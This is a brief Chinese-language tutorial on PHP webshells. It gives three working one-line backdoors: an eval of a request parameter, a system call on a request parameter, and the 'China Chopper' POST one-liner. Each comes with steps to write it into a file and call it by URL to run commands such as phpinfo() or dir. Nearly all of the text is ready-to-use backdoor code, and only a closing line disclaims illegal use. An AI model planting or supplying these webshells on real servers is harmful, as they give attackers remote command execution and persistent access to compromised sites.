webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。
一、eval,使用PHP函数,例如phpinfo()
1、把下面内容写入1.php文件
<?php eval($_REQUEST['cmd']);?>
2、访问该文件
http://192.168.152.128/1.php?cmd=phpinfo();
二、system,使用系统命令,例如:dir(win),ls(linux)
1、把下面内容写入1.php文件
<?php system($_REQUEST['cmd']);?>
2、访问该文件
http://192.168.152.128/1.php?cmd=dir;
三、菜刀一句话
1、把下面内容写入1.php文件
<?php @eval($_POST['abc']);?>
2、在菜刀添加该文件路径,点击添加
3、双击网址进入
禁止非法,后果自负
